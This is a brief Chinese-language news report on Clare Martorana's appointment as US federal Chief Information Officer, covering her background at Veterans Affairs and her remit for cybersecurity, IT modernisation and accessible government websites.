据悉，美国现任总统乔·拜登（Joe Biden）任命克莱尔·马托拉纳（Clare Martorana）为美国首席信息官（Chief Information Officer），负责全面监管美国白宫升级政府技术基础设施的工作。Martorana 是美国数字服务部门的资深人士，上任之后将负责加强联邦政府的网络安全，实现 IT 系统的现代化，并使所有公民更容易访问政府网站。 Martorana 还将会负责确保数字选举信息和网上选民登记对每个人都是无障碍的，包括残疾人和英语理解能力有限的人。这部分职责对拜登来说尤为重要，他最近发布了一项旨在加强投票权的行政命令。 Martorana 曾在人事管理办公室担任同样的职位，她有十多年在健康技术公司担任高管的经验，包括 WebMD 和 Everyday Health。2016 年 10 月，她加入了美国退伍军人事务部（USDS）的团队，领导了该机构数字基础设施的现代化工作，并使退伍军人更容易在线访问和管理他们的福利。 在退伍军人事务部，Martorana 利用以人为本的设计原则，让退伍军人参与到设计和开发技术的过程中。Martorana 和 USDS 设计总监 Kat Jurick 在谈到他们在该机构 2019 年的工作时写道：“从重建面向退伍军人的应用程序到创建个性化的仪表板，退伍军人可以在一个地方看到他们的福利，我们的方法是相同的：退伍军人是我们所做的每一个决定的中心”。 现在，Martorana 将承担更大的挑战。目前肆虐美国的新冠疫情凸显了很多政府网站在处理紧急实物方面的补足，使用 60 年前编程语言创建的失业门户网站在高需求下崩溃；全国疫苗推广也需要一个全面的政府数据库。除了疫情，美国政府最近还遭遇了历史上最严重的网络安全漏洞之一–SolarWinds黑客事件，11个政府机构被渗透。           （消息及封面来源：cnBeta）